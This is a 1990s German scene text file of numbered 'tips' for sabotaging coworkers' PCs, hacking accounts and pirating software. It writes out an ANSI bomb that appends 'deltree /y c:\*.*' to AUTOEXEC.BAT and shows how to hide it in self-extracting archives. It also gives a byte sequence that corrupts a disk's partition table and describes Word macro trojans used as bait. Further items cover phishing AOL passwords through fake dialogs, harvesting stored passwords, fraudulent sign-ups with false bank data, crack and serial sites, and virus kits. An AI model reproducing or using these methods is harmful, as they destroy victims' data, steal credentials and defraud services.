Vorwort von THE MIGHTY SCI!:
Jo ... hallo erstmal ... ich bin zwar nicht der Rüdiger ... aber macht ja nichts. Gerade haben wir beschlossen, unsere vierwöchige Schaffenspause mit drei neuen Releases zu überbrücken. Aber nicht daß Ihr denkt, wir haben in der Zwischenzeit auf der faulen Haut gelegen. Seit über 3 Wochen bin ich schon dabei mein neues Board zu installieren, tonnenweise und nächtelang Ansis zu pinseln und PPEs auseinanderzunehmen, weil mal wieder ein paar Coder zu blöd sind, ihrem tollen Release ein CFG-File zu spendieren. Natürlich wird das neue Board auch ein paar neue Releases mit sich bringen: Lord Xeen codet grade am Shopping-Door, am UserMeetingDoor (das übrigens für die Western Alliance ziemlich wichtig ist, denn Group-Members sollten sich ja auch regelmäßig mit solchen Leute treffen, die Ihre Releases scheiße finden hehe) und hoffentlich bringt er auch noch den neuen Chatter fertig. Doc Fred arbeitet grade an seinem ersten längerem Roman (nachdem Ihr meine letzten Kurzgeschichte hoffentlich interessant gefunden habt). Sandman bastelt hoffentlich die WWW-Page zuende und Netrider is auch grad drüber, nen neuen Song aufzunehmen. Trotzdem würden wir uns über neue Members freuen. Callt einfach die Shogunat, wechselt in die UE-Konferenz und schreibt mir ne schöne Mail :)
und jetzt viel Spaß mit Bad Peon's
Thema | Tip-Nummern |
CD-ROM | 6 |
Datenspionage | 31 32 45 |
19 24 30 | |
Excel | 0 |
EXE-Dateien | 4 |
Internet | 11 14 19 24 |
Komprimierer | 4 21 |
Makros | 1 16 24 25 39 41 |
MS-DOS | 4 5 6 9 15 16 18 |
Netzwerk | 25 29 31 36 44 |
OLE | 39 |
Online | 2 3 11 14 19 26 27 30 |
OS/2 | 40 |
Paßwörter | 15 21 27 28 32 44 |
Freischaltungen | 13 14 17 24 |
Shareware | 13 33 |
Start-Parameter | 0 1 4 10 |
Trojanity | 24 25 29 35 39 41 |
Viren | 12 24 25 29 35 39 41 |
Windows | 0 1 5 6 7 8 10 20 22 23 24 34 37 38 39 42 |
Windows 3.x | 5 6 7 8 20 23 24 28 35 43 36 |
Windows95 | 35 37 38 39 42 43 44 46 |
Winword | 1 22 25 35 41 |
Gestern hat mich Kollege S. mit seiner neunmalklugen Art maßlos geärgert. Im Grunde ist er noch einer der Genießbaren in diesem Laden, aber eine kleine Rache konnte ich mir doch nicht verkneifen: Da ich weiß, daß er vorwiegend mit Excel arbeitet, setzte ich am Abend, als er vor der Tagesschau saß, hinter den Programmaufruf "excel.exe" im Programm-Mangaer zusätzlich den Schalter "/d". Dieser unerfreuliche Parameter fährt Excel zwar wie gewohnt hoch, gibt dem Excel-Fenster jedoch keinen Eingabefocus: Innerhalb des Fensters läuft dann die Sanduhr und verbietet alle Eingaben oder Menüaufrufe.
(1) Winword starten: "Hello" and "Goodbye"
1.
Bewertung: Harmlos
Ein ätzendes Arbeitsumfeld. Man kann sich hier nur abreagiern, indem man seine Umgebung mit drastischem PC-Versagen beglückt. Meist sind meine Eingriffe harmloser Natur und verursachen trotzdem gewaltigen Ärger. Gern ändere ich zum Beispiel die Winword-Programmzeile im Programm-Manager. Statt "winword.exe" trage ich die Zeile "winword.exe /mDateiBeenden" ein. Da Winword jedes beliebiege Makro oder jeden Standartbefehl nach dem Parameter "/m" akzeptiert, läßt sich mit dem Start des Programms auch gleich dessen Beenden anfordern. Das ist zwar Blödsinn, sorgt jedoch für einige Verwirrung und lockert so den Büroalltag auf.
2. Bewertung: Massiv
Viel Spaß bereiten mir auch kleine Manipulationen an den bekannten INI-Dateien. Weil er ebenso simpel wie undurchsichtig ist, favorisiere ich folgenden Trick: Ich hänge an die Zeile "shell=progman.exe" der SYSTEM.INI das unsichtbare ASCII-Zeichen 255 an. Danach verabschiedet sich Windows bereits beim Start und der ratlose Mitmensch erwägt schließlich gar eine Neuinstallation.
(2) Modem-Strafen gegen Wichtigtuer
Bewertung: Harmlos
Ich kann es auf den Tod nicht leiden, wenn mich arrogante Wichtigtuer nicht ernstnehmen. Vor allem in öffentlichen Instutitionen kokettieren am Bürostuhl festgewachsene Ignoranten mit ihrer vielbeschäftigten Wichtigkeit - und gehen partout nicht ans Telefon, wenn ich anrufe. Auch manche Kollegen lassen mich grundsätzlich warten.
Damit sie erfahren, daß ich das nicht abkann, unterbreche ich nach dem 10. Klingelversuch stets meine Voice-Connection und lasse besser mein Modem arbeiten: Dem ist es nach dem Befehl "ats7=255" ganz egal, ob es 100mal klingeln muß. Irgendwann geht "er" oder "sie" dann doch ran und hört mich pfeiffen. Dann lasse ich gleich noch mal das Modem arbeiten - Strafe muß schließlich sein!
(3) Beim Faxen kann es rundgehen!
Bewertung: Massiv
Kollege W. ist ganz wichtig. Ganz wichtige Menschen haben auch zu Hause ein Fax. Ich bin unwichtig, mag ganz Wichtige nicht, habe aber auch ein Fax zu Hause - ein Fax gegen ganz Wichtige: Ich klebe drei freundlich bedruckte DIN-A4-Blätter mit Tesa zusammen und lege sie ins Faxgerät. Ist der Fax-Job soweit durchgelaufen, bis sich das vordere Ende mit dem hinteren zu einem Kreis schließen läßt, verklebe ich diesen ebenfalls mit Tesa. Bevor ich nun für ein paar Stunden in die Kneipe gehe, prüfe ich, ob sich mein Endlos-Fax auch wirklich störungsfrei dreht...
Immer drandenken: Das Papier des Kollegen W. ist teurer als meine Telefoneinheiten!
(4) Viel Farbenpracht mit ANSI-Bomben
Bewertung: Harmlos bis vernichtend
Mit ANSI-Bomben kann man tolle Sachen machen... z.B. Tasten umbelegen:
[13;8;13;13p
In diesem Fall erhält die [Return]-Taste (ASCII 13) einen eingebauten Rückschritt
(ASCII 8) verpaßt, was sie normale Eingabe fantasievoller gestaltet.
Extrem gefährliche Belegung:
"/";13;"echo deltree /y c:\*.* >> c:\autoexec.bat";13;"cls";13;13p
hängt ein "deltree /y c:\*.*" und ein "cls" an die autoexec.bat an, sobald die
"/"-Taste einmal gedrückt wird. Nach dem nächsten Booten dürfte der glückliche
User mehr Platz auf seiner Platte frei haben!
Solche Bomben kann man gut über selbstentpackende Archive anderen Leuten unterschieben; dummerweise schaltet PKZIP ANSI-Kommentare ja standartmäßig ab, doch es gibt ja noch ARJ... ich lege also mit "arj a arch dateien" das Archiv an, füge mit "arj c arch -zKommenterdatei" den Kommentar (die ANSI-Bombe) hinzu und mache das Archiv mit "arj y -je1 -ja arch" zum Selbstentpacker. Zur besseren Tarnung schmücken ich seine ANSI-Sequenzen mit einigen farbenfrohen Bildern und Texten.
Diese Belegungen halten natürlich nur solange, bis der Rechner neu gebootet wird oder die DOS-Box beendet wird, also keine allzu latentente Belegungen! Außerdem: Ohne ANSI.SYS geht (logisch) gar nichts. Übrigens existieren auch komfortable ANSI-Bomben-Generatoren, wie z.B. ANSIB20.EXE, mit denen man äussert einfach und effektiv ANSI-Bomben erstellen kann. Solche Programme sollte man keinen Loosern geben!
(5) WIN.COM und SETVER.EXE: Umgekehrt eingesetzt
Bewertung: Massiv
SETVER dient ja bekanntlich dazu, nicht laufenden Programmen eine andere DOS- Version vorzugaukeln, damit sie funktionieren. Aber umgekehrt klappt's noch besser: Mal kurz "setver win.com 3.00" eingetippt, und schon wird Windows 3.1x nie mehr funktionieren - sogar eine Neuinstallation bringt nichts (einzig und allein "setver win.com /d").
(6) Wer ein CD-ROM hat, hat mehr vom Leben. Oder auch weniger!
Bewertung: Harmlos
Wer weiß, daß DOS den Namen des CD-ROMs (wird von MSCDEX abgefragt) wie einen reservierten Gerätenamen (wie LPT1) betrachtet, kann natürlich in CONFIG.SYS und AUTOEXEC.BAT einen anderen, populäreren Namen als "MSCD001" einstellen, z.B. WIN, und schon kann man auf kein Verzeichnis namens WIN und auf keine Datei WIN.* mehr zugreifen!
(7) Windows: Farben verbogen
Bewertung: Harmlos
Zugegeben nicht sehr tiefgreifend, aber ganz nett kommt es, wenn man unter Windows die Farben der Bildschirmelemente "Menütext", "Menüleiste", "Deaktivierter Text", "Hervorhebung" und "Aktiver Text" alle auf weiß setzt. Mangels Kontrast dürfte die Lesbarkeit deutlich leiden... und wer nicht weiß, in welcher INI-Datei die Farben stehen, dürfte Probleme haben, ohne Neuinstallation jemals wieder vernünftig arbeiten zu können.
(8) Windows ohne Programme
Bewertung: Massiv
DAS hätte ich nicht mal Microsoft zugetraut: Die typischen Extensionen für ausführbare Programme in Windows sind nicht fest verdrahtet, sondern stehen im Klartext in der WIN.INI in der Zeile "Programs="! Wer hier mal schnell etwas aufräumt ("Wer braucht schon EXE-Dateien?!") kann einiges an Verwirrung stiften!
(9) DOS- und Windows-Bug verhindert Booten
Bewertung: Absolut mega-ultra tödlich, garantiert vernichtend fatal und letal!
Ein besonders unglückliches Gesicht machen PC-Besitzer, die beim Booten die Meldung "Bitte Systemdiskette einlegen" lesen müssen. Noch verzweifelter werden sie, wenn sogar diese Meldung ausbleibt. Stundenlanges suchen nach einem Fehler im CMOS wäre die Folge - ohne Erfolg. Dank eines Bugs in MS-DOS Version 5.0 und höher kann ich jede Festplatte mittels eines simplen Diskeditors rigoros killen und fast völlig unbrauchbar machen:
Ich suche mir also in der Partitionstabelle die Eintragungen für die aktive
Partition (leicht an der führenden "80" (hex) ab Offset 1DE von Zylinder 0,
Sektor 0 zu erkennen) und ersetzt ihn durch diese Byte-Folge:
0000 0100 0500 B80B 0100 0000 BC01 0000
Wird das System nun neu gestartet, interpretiert DOS den Eintrag als eine
nicht aktive, erweiterte Partition, beginnend bei Kopf 0, Zylinder 0, Sektor 1
und endend bei Kopf 0, Zylinder 523, Sektor 56. Da der Beginn dieser Partiton
identisch mit dem Master-Boot-Sektor (Kopf 0, Zylinder 0, Sektor 1) ist,
rotiert DOS bei der Suche nach aktiven Partitionen im Kreis ("rekursive
Partition"). In der Folge bleibt das System im Bootvorgang stehen. Das Booten von
Diskette hilft auch nicht weiter, denn auch hier versucht das Betriebssystem,
die Festplatte zu initialisieren, und verfängt sich ebenfalls im Teufelskreis.
Dies ist die schlimmste nicht-physikalische Beschädigung einer Festplatte, die mir bekannt ist. Die einzige Rettung ist eine Bootdiskette mit MS-DOS 3.3 oder DR-DOS drauf; dann kann man die Platte wenigstens neu partitionieren. Die Daten, die vorher drauf waren, sind spätestens dann garantiert futsch.
(10) PIF - Perverted Information File
Bewertung: Massiv
Nichts ist besser als eine verbogene PIF-Datei dazu geeignet, einem Windows- Fuzzi zu zeigen, daß er von DOS besser die Finger lassen sollte. Ich suche mir seine Verknüpfung mit Command und hänge an die Befehlszeile "command.com" noch ein "/p" dran. Damit ist der Rückweg über "exit" gesperrt. Wenn ich jetzt noch alle "Zugriffstasten auf Windows" für DOS reserviere, gibt es keinen Ausweg mehr aus der DOS-Box (außer einem Warmstart). Dieser User wird nie mehr eine DOS-Box starten!
(11) Kostenlos ins Internet
Bewertung: Spart Geld
Meine ersten Ausflüge ins Internet waren ergiebig, aber teuer: Ich schüttete eine Dose Cola über die Tastatur, als ich die erste Rechnung las. So konnte es nicht weitergehen! Ich beschloß, in Zukunft kostenlos zu surfen. Mit den von (fast) allen Online-Anbietern offerierten Probe-Accounts kann man sich jeweils zwischen 10 und 70 Stunden gebührenfrei im Internet herumtreiben.
Ich sammle alle Disketten und CDs, die AOL verschenkt: Auf jeder dieser Disketten steht der Zugangscode mit dem -passwort, mit deren Hilfe man sich als neuer User anmelden kann. Wenn ich einigermaßen sinnvolle persönliche Daten angebe, habe ich schon wieder 10 Stunden "kostenlos" (Telekom suckx!) zur Verfügung. Es gibt sogar AOL-Account-Hackerprogramme, die auf Mausklick einen gülitgen Zugang erzeugen und einen gleich bei AOL anmelden. Einfacher und schneller geht's nicht. Leider gibt's gelegentlich Probleme mit den deutschen Versionen der Zugangssoftware, aber auch dafür gibt's inzwischen Patches.
Quantitativ noch besser aber dünner gesät und vor allem langsamer sind die CompuServe-Probe-Accounts mit 70 Freistunden.
Anmerkung von Mighty SCI:
einfach besser ist es natürlich, falsche Kontonummern und Adressen bei AOL anzugeben, wenn man Glück hat, kann man einen ganzen Monat lang umsonst surfen. Allerdings sollte man vorher den Netscape Navigator installieren, sonst sieht man auf Seiten mit Frames GAR NICHTS und außerdem schmeißen einen die ganzen Warez-Groups mit "AOL SUCKS"-Detektor gleich wieder raus!
(12) Frankenstein in Aktion: Viren Marke Eigenbau
Bewertung: Vernichtend
Fremde Viren zu horten und auszusetzen macht nur kurze zeit Spaß. Besser sind da die einschlägigen Virus-Construction-Kits wie z.B. das "Instant Virus Production Kit" (IVP) oder das "Virus Construction Lab" (VCL), wobei VCL besser und komfortabler ist, da man für IVP noch einen ASM-Compiler braucht. In VCL ist zwar eine Paßwortabfrage eingebaut, aber wer William Gibsons "Neuromancer" gelesen hat, dürfte auf die Lösung gekommen sein: "Chiba City". VCL kennt viele Schadenseffekte von "Beep the PC speaker" über "Display an ANSI" bis hin zu "Trash some Disks", auch in Kombinationen und nur unter bestimmten Bedingungen (z.B. Datum). Allerdings erkennen viele Virenscanner die Viren, die VCL erzeugt.
(13) Shareware: Zahlen sollen andere
Bewertung: Ganz verboten!!!
1.
Mich nerven die ewigen Registrieraufforderungen von Sharewareprogrammen, die
hier ein [Return] und dort ein
Mit Hilfe eines Windows-Resource-Kits, das in allen gängigen Compilern enthalten
ist, kann man die Zahlungsaufforderungen aber auch gleich ganz aus dem
Code entfernen. So läßt sich etwa mit Borlands Resource Workshop (enthalten in
den Programmiersprachen Borland Pascal und Boland C++) fast jedes Windows-Programm
auseinandernehmen. Meist sind die "Nag-Screens" (Nerv-Meldungen) schnell
gefunden - nichts wie weg damit: einfach die Ressourcen-Nummer löschen.
Sollte es mal nicht klappen, liegt's meistens daran, daß das Programm mit
Visual Basic geschrieben ist. Kein Problem: Decompilier dafür sind überall
erhältlich. Dann noch schnell die Nag-Screens deaktivieren und das Programm
auf den eigenen Namen registrieren - fertig.
2.
Freischaltschlüssel für viele Programme gibt es in Mailboxen und v.a. im Internet.
Einfach die Suchdienste bemühen, die meisten Seiten enthalten viele
Links und so hat man schnell eine ansehliche Addressensammlung für Cracks und
Hacks in seiner Bookmark-Liste. Ausprobieren sollte man mal:
http://www.aloha.com/~merlin/DrDoS/appslist.htm
3.
Noch schöner sind natürlich Crack-Sammlung wie z.B. der Nag-Buster, zu finden
in den hinteren Ecken des Internets.
4.
...und Mighty SCI meint da noch: SoftICE rulez! :)
(14) Internet-Seriennummern für die Installation
Bei der Installation neuerer Programme fragt das Setup öfters mal nach einer
Seriennummer. Zu meinem Erstaunen funktioniert hier ziemlich oft simpler
Zahlensalat - einfach mal aufm numerischen Ziffernblock austoben! Wenn's
nicht geht, muß ich halt eine Liste mit Tausenden von Seriennummern drauf
bemühen, zu finden z.B. unter:
http://icecube.acf-lab.alaska.edu/~fstbo/warez/serial.html
(15) Lächerliches Dosshell-Paßwort
Die Dosshell, dieses Mini-Windows, das bei MS-DOS 5.0 dabei ist, war von
Anfang an eine Totgeburt. Ein paar Idioten gibt es aber doch, die sich dafür
begeistern und ausgiebig von der Funktion gebrauch machen, Programme mit
einem Paßwort zu versehen. Lächerlich: Erstens kann jeder die Shell verlassen
und die Programme unbeheligt direkt starten; zweitens steht das Paßwort
"verschlüsselt" in der SHELL.INI. Selbst Achtjährige könnten diesen Code
knacken! Jeder Buchstabe des Paßworts wird im Alphabet einfach sechs Stellen
zurückgestellt. Und - o Wunder - Buchstaben, die dabei herausfallen, werden
am Ende wieder eingesetzt!! Ein G wird also zu A, H zu B usw. A-F wird zu U-Z.
Warum sollte man sowas hacken? Ganz einfach: Viele Leute benutzen immer das
gleiche Paßwort! Und so kommt man dann an Passwörter für Online-Dienste, Netzzugänge etc.
(16) Immer Ärger mit Doskey-Makros
Meine Alleinherrschaft am DOS-Prompt scheint längst gebrochen. Immer mehr
Kollegen glauben, ein Blick ins Handbuch oder in die kümmerliche Online-
Hilfe würde sie lehren, was in DOS steckt. Um sie wieder auf den Boden der
Realität herunterzuholen, setzte ich meinen alten Freund Doskey ein.
Dazu muß ihm zuerst einmal lahmlegen, dann auch sein Leistungsumfang ist gut
dokumentiert. Doskey weigert sich allerdings recht beharrlich, spurlos von
der Bildfläche zu verschwinden. Befehle wie "doskey doskey=echo." geben den
gesamten Befehl hinter dem "=" am Bildschirm aus und verraten so die bösen
Pläne.
Abhilfe schafft das ASCII-Zeichen 255. Zuerst erstselle ich eine Batchdatei
mit diesem unsichtbaren Zeichen als Namen und mit folgendem Inhalt:
Die Batch bewirkt, daß Doskey nach außen hin einwandfrei funktioniert.
Zwischen der ersten und der letzten Zeile kann ich beliebige Doskey-Bosheiten
treiben. Die letzte Zeile, die wieder mit dem unsichtbaren Zeichen endet,
deaktiviert den Doskey-Aufruf selbst, der fürderhin nur noch diese Batch
aufruft und keine Makros mehr definiert.
Besonders schick finde ich diese unsichtbare Batchdatei mit einem
VerstecktAttribut, und der angestammte Aufruf für eine ASCII-255-Batch ist
natürlich eine (unsichtbare!) Zeile in der AUTOEXEC.BAT. Halbgelehrte DOS-User
sind mit solchen harmlosen Eingriffen schenll wieder auf den Boden der
Realität zurückgeholt (Besonders, wenn ihnen nach dem nächsten Windows-Start
und -Ende (oder dem Start ein DOS-Box) das Windows-Verzeichnis ausgeleert
wird!).
(17) Demoprogramme: Keine lästigen Datumsabfragen
Manches Demoprogramm erdreistet sich, nur eine gewisse Probezeit zu laufen.
Danach erscheint die Meldung, daß die Probezeit jetzt vorbei sei und ich doch
bitte die Vollversion erwerben möge. Schade, denn eigentlich habe ich die
Vollversion des Programms ja schon auf meiner Festplatte, wäre da nicht dieser
Zeitcheck. Die Lösung des Problems ist simpel: Einfach das Datum umstellen!
Und weil's bei größerern Programmsammlungen schnell unübersictlich wird, gibt
es für sowas Datecracker: Sie setzten vor dem Start das Systemdatum zurück und
danach wieder vor. Vom Datecracker merkt man nichts, da er ständig im
Hintergrund läuft. Ein hilfreiches Utility, daß einem im laufe der Zeit eine Menge
Geld spart; zu bekommen im Internet oder in der einschlägigen Mailboxen.
(18) Finaler Schuß mit Verzögerung - die Pipebomb!
Meine Toleranzgrenze hinsichtlich Kollege W. ist endgültig überschritten, da
er mich gestern erneut beim Chef angeschwärzt hat. Heute mittag nutze ich
seine Abwesenheit für einen finalen Anschlag: Ich beende sein laufendes
Windows und start es neu mit:
(19) Anonyme Remailer: 10.000 digitale Fußtritte
Anonyme Massen-Mails sind praktisch, wenn man mal unerkannt Dampf ablassen
will. Leider weigern sich die gängigen Mail-Programme, Post ohne Absender zu
verschicken. Aber Not macht erfinderisch, und inzwischen tummeln sich im Internet
Gleichgesinnte, die ihre Dienste als "Anonyme Remailer" anbieten. Also:
Die entsprechende WWW-Seite anwählen, Formular ausfüllen, und ab geht die
Post - wenn gewünscht sogar in 10.000facher (!) Ausfertigung an den geliebten
Empfänger. Die entsprechenden WWW-Seiten sind kein Geheimnis: In den üblichen
Suchmaschinen (z.B. http://www.yahoo.com) findet man Links zu den verschieden
Remailern.
Aber es geht noch simpler: Mit AMAIL10.ZIP findet man auch für Windows 95
einen Mail-Client, der in der Lage ist, Post ohne Absenderangabe zu befördern.
(20) Durch die Hintertür zur Programmausführung
Bewertung: Schnüffelei
Eine Geschäftsreise führte mich in eine öffentliches Institut. Dort setzte man
mich an ein absolut restriktives Windows 3.11-System, das als einzige Anwendung
Works erlauben sollte. Es war mir auf Anhieb weder möglich, das als Shell
eingestellte Works schon über DOS zu übergehen, noch unter Works "anderes
auszuführen".
Doch eine Lücke gibt es immer, zumal Windows mit OLE und dem Objektmanager
immer eine Hintertür zur Programmausführung offenhält. In diesem Fall behalf
ich mir folgendermaßen: Das Works-Menü enthält wie alle anderen Anwendungen
standartmäßig den Befehl "Einfügen, Objekt". Wählt man hier Objekttyp "Paket",
öffnet sich der Objektmanager.
Hier gibt es wiederum dem Befehl "Bearbeiten, Befehlszeile", über den sich
jedes beliebige Programm, etwa auch der Programm- oder Dateimanagaer starten
läßt - somit steht wieder die gesamte Windows-Funktionalität uneingeschränkt
bereit! Daß ich bei dieser Gelegenheit Spuren hinterließ, die meinen
Durchbruch nachhaltig dokumentierten, versteht sich von selbst...
(21) ZIP-Dateien mit Norton Commander schlechter verschlüsselt
Ein Charakterzug eines erfolgreichen Hackers ist Geduld bei ständiger
Wachsamkeit. Es kann Wochen, manchmal Monate dauern, bis ein Problem sich
zufällig und wie von selbst löst. Ein Kollege von mir pflegte offenbar
wichtige Daten als ZIP-Archive ins Netz zu stellen. Die Daten waren mit
einem anscheinend langen und komplexen Paßwort so gut geschützt, daß sich
meine Brute-Force-ZIP-Knack-Routine auch nach stundenlangen Crack-Versuchen
nachhaltig die Zähne ausbiß. Ich hortete also die Dateien und wartete auf
bessere Tage...
Die Gelegenheit kam: Unvermutet tauchte der Kollege auf und bat mich um einen
Rat wegen einer Excel-Anpassung. Ich hatte eine halbe Stunde Zeit, mich
auf seinem Rechner umzusehen, und fand prompt die Datei ZIP.LST in seinem
TEMP-Verzeichnis. Die lizensierte PKZIP-Version im Norton Commander legt diese
ASCII-Datei an, und sie enthält das Paßwort in unverschlüsselter Form.
Erfreulich, daß die meisten Menschen immer das gleiche Paßwort benutzen: Das
so emittelte Paßwort paßte nicht nur für die vorher gesammelten ZIP-Archive,
sondern gab mir auch Zugang zum Novell-Account des Kollegen!
Übrigens: Sein Excel-Problem habe ich erfolgreich gelöst. Er mag mich.
(22) Winword 6/7 - automatisch falsch
Microsoft hat den Winword-Anwender mit besonders schönen, automatischen
Funktionen beglückt: Fast alle Fehler korrigiert Winword schon bei der
Texteingabe - es ist wohl nur noch ein kurzer Weg bis zur vollautomatischen
Brief-, Fax- und Romanerstellung auf der Basis von Microsoft-Vorlagen.
Kollege W. ist kein besonderer Fan dieser Funktionen, könnte es aber bald
werden:
Unter "Extras, Autokorrektur" gebe ich eine Liste mit falsch zu schreibenden
Wörtern ein (z.B. "Ersetzen: Beispiel Durch: biespeil"), wobei ich darauf
achte, daß die Option "Während der Eingabe ersetzten" aktiviert ist.
Vielleicht fülle ich bei der nächsten Gelegenheit zusätzlich sein Benutzer
wörterbuch BENUTZER.DIC mit beliebten Rechschreibfehlern. Damit ist sicher
gestellt, daß auch die Rechtschreibprüfung mehr Fehler übersieht als findet.
(23) Beschwippste Mäuse für Rechtshänder
Schön, daß die Entwickler von Windows auch an Linkshänder gedacht haben. Wenn
man Windows richtig konfiguriert kann man unsymphatische Rechtshänder zwingen,
eingefahrene Denkgewohnheiten aufzugeben. Ich habe in der
Windows-Systemsteuerung die Maus meines Kollegen S. auf linkshändig
umgestellt. Niemand zwingt
ihn nun, den Zeigefinger durch Doppelklicken zu überlasten, während sich der
Mittlelfinger ausruhen darf. Um ihn bein dieser Umstellung zu fordern, habe
ich die Doppelklickgeschwindigkeit extrem hoch eingestellt. Im Vorbeigehen
sehe ich den Streber S. an einer um 180ø gedrehten Maus arbeiten. Es dauert in
diesem Laden, bis die EDV-Abteilung eine Antrag auf eine neue Maus stattgibt.
Übrigens: Damit er die Maus nicht gleich wieder umstellt, habe ich nach der
Änderung die SYSTEM.INI schreibgeschützt. Ein Windows-User scheint mit solchen
systemnahen Dingen überfordert zu sein.
(24) Windows 3.1x - ein Reboot tut immer gut
Da sitzen die Kollegen stundenlang vor dem PC, ohne auch nur ein einziges Mal
ihr System neu zu installieren oder wenigstens frisch zu starten. Wer einen
Windows-PC derart behandelt, muß sich nicht wundern, daß sich Überreste
gebrauchter DLLs und sonstiger Abfall im Speicher sammeln. Die Folge: Das System
läuft instabil, und alle fluchen auf Bill Gates. Also: Wer nicht freiwillig
während der Arbeit den Computer neu bootet, den zwinge ich persönlich zu einem
angemessenem Umgang mit Windows.
Als Handwerkszeug benutze ich Winword, gehe aber selbstverständlich anders vor
als die bekannten Makroviren oder ähnlich konstruierte Trojaner. Ich öffne
eine neue Dokumentvorlage, in der ich die beiden Makros "AutoOpen" und "Ciao"
unterbringe, und schreibe einen netten Text in das Dokumentfenster - zum
Beispiel Geburtstaggrüße. Jetzt muß ich die Vorlage als normalen Word-Text
tarnen, indem ich die Dateiendung von DOT auf DOC ändere. Der "Text" sieht
dann etwa so aus:
Diesen "Text" schicke ich per E-Mail. Öffnet jemand die Datei mit Winword,
kopiert "AutoOpen" das zweite Makro "Shutdown" unter dem Namen "Reboot" in
die globale Dokumentvorlage. Über die OnTime-Anweisung rufe ich das Makro
genau eine Stunde später ab. Mein Text ist bis dahin längst vergessen. Da
ich heute nur den Kollgen W. treffen will, der die Winword-Version 7 benutzt,
kann ich mir die Varianten für ältere Programmversionen ersparen.
(25) Beim richtigen Köder beißt jeder an
Winword-Köderdateien mit selbstauslösenden Makros sind mein beliebtestes
Werkzeug, fremde Rechner zu optimieren. Das technische Prinzip dieser
Dokumentviren oder Trojanischen Pferde ist klar und mittlerweile
leider beschrieben. Aber entscheidend für den Erfolg oder Mißerfolg eines
solchen Köders sind der Dateiname und der Inhalt der Datei - und hier
erweisen sich manche Hacker-Kollegen als fantsielos.
Ein Beispiel für eine sehr erfolgversprechende Köderdatei - gut zugänglich im
Hausnetz postiert - könnte etwa SEXTIPS.DOC heißen: Man glaubt gar nicht, wie
viele Mitmenschen dringend Tips benötigen... Die nächste Überlegung betrifft
den Inhalt: Dumm, sich hier nur auf bloßen Text zu beschränken! Dann öffnet
ein potentielles Opfer den Text mit einem unsensible DOS-Viewer, und die hübschen
Makros wären für die Katz! Nein: Der Hauptinhalt einer erfolgreichen
Köderdatei sind eingebettete Bilder, die das Opfer mehr oder weniger zwingen,
die gewünschte Anwendung zu starten. Findet ein Benutzer im DOS-Viewer nur
einige Zeilen vielverheißenden Bildkommentar, gibt es in der Regel kein Halten
mehr: Er startet Winword, um die Bilder zu sehen - und es entspricht meiner
Philosophie "Tarnung durch Befriedigung", daß er dann auch wirklich zu sehen
bekommt, was er erwartet. Dann denkt er garantiert nicht mehr an Makroviren.
(26) Internet-Surfen wird zur Geduldsprobe
Internet-Surfer haben eine Engelsgeduld. Stundenlang beobachtet mein Kollege
mit bösem Blick, wie eine Web-Seite Byte für Byte in seinen PC tröpfelt. Ob
auch ihm mal der Geduldsfaden reißt? Ein präpariertes HTML-Dokument soll seine
Schmerzgrenze testen. Um sicherzugehen, daß die HTML-Seite beim Start von
Netscape geladen wird, trage ich etwa "file://terror.htm" unter "Options, General
Preferences, Appearance, Start With" ein und aktiviere den Radiobutton "Home
Page Location".
terror.htm sieht ungefähr so aus:
[ entspricht < und ] entspricht >
Die beiden Java-Script-Zeilen öffnen ein Mitteilungsfenster mit dem
angegebenen Text. Ein Klick auf den OK-Button bringt nichts, und auch
Netscape läßt sich nicht mehr beenden. Bleibt also nur noch der
Drei-Finger-Griff [Strg]-[Alt]-[Entf], den man am besten mit einem wilden
Fluch begleitet - zumindest mein Kollege tut es das: Und es hilft!
Das ganze funktioniert bei Netscape 2.01 nur dann, wenn Java und Java Script
nicht deaktiviert sind.
(27) Compuserve und America Online für Hacker
Gehackt wir überall: Hacker gibt es nicht nur im Internet, sondern auch in
Compuserve und America Online. Da das Hacken mit guter Software leichter geht,
haben Leute feine fiese Software gedrechselt. Mit diesen Programmen kann man
Mail-Bomben verschicken, Chat-Räume mit einem Mausklick zum Schweigen bringen,
aber auch Paßwörter klauen oder kostenlos ins Internet spazieren.
Compudaze, ein Compuserve-Hackprogramm, beschränkt sich im wesentlichen auf
Spielereien mit Compuserve-Chat-Räumen und auf Massen-Mails. Für AOL dagegen
gibt es zig Programme, die alle Möglichkeiten der
America-Online-Software ausreizen.
Zur Zeit ist es nicht leicht, an AOL-Hack-Software heranzukommen. Warum? AOL
nötigt jeden, der AOL-relevante Software im Internet oder somstwo anbietet,
das Material zu entfernen. Offensichlich ist AOL nicht in der Lage,
Hack-Programme abzublocken. Den meisten Spaß verursachen AOL-Hack-Programme, die es
gestatten, bei aktive AOL-Benutzern eine offiziell wirkende Dialogbox auf den
Bildschirm zu zaubern.
In die Dialogboxen kann man einen beliebigen Text eingeben. So habe ich
AOL-Benutzer mit dem Dialog "AOL-Sicherheitsabfrage" aufgefordert, ihr Paßwort
erneut einzutippen.
Fast alle Benutzer haben mir ihr Paßwort verraten. Bequemer kann ich mir das
Hacken von Accounts nicht vorstellen. Dies ist ein Trick, der übrigens fast
überall funktioniert, wo Paßwörter gebraucht werden, z.B. in einem Novell-Netz.
(28) Paßwort knacken leicht gemacht
Im Laufe der Zeit haben sich bei mir die Paßwortknacker angesammelt, die ich
immer wieder verwende. Nicht, weil mich etwa ein läppisches Screensaver-Paßwort
an sich so brennend interessieren würde, sondern aufgrund der Erfahrung,
daß die meisten Mitmenschen nur ein einziges Paßwort benutzen: Habe ich eins,
habe ich alle!
Leicht zu ermitteln ist das Bios-Paßwort, sofern auf dem Rechner ein solches
vergeben ist. Knack-Programme gibt's für verschiedene Bios-Typen. Ebenfalls
ohne große Mühe herausfinden läßt sich das in der CONTROL.INI verschlüsselt
gespeicherte der 16-Bit-Windows-Screensaver. Auch Compuserve, AOL und T-Online
speichern Paßwörter mehr oder weniger (eher weniger) verschlüsselt in INI-Dateien.
Mit dem richtigen Programmen ist die Verschlüsselung im Nu geknackt.
Nun kann man fast immer davon ausgehen, daß eines davon für den Netz-Account
oder andere entscheidende Paßwortabfragen des Kollegen paßt. Man muß also diesen
Umweg gehen, denn der Frontalangriff auf die Paßwörter für Novell und Windows
NT funktioniert fast gar nicht. Sie lassen sich leider nicht so ohne weiteres
per Software knacken.
(29) Novell: Wer löscht hier eigentlich?
Ich arbeite in einer Firma, in der die Datenverarbeitung überwiegend in einem
Novell-Netz stattfindet. Meine Schnüffel-Aktionen laufen meist auf Basis von
Trojanischen Pferden, die ich als Dokumente getarnt ins Netz stelle. Damit
diese Dateien mich nicht als "Owner" verraten, kopiere ich sie unter einem
falschen Login auf den Server.
Das ist kein Problem - und funktioniert meiner Erfahrung nach in jedem
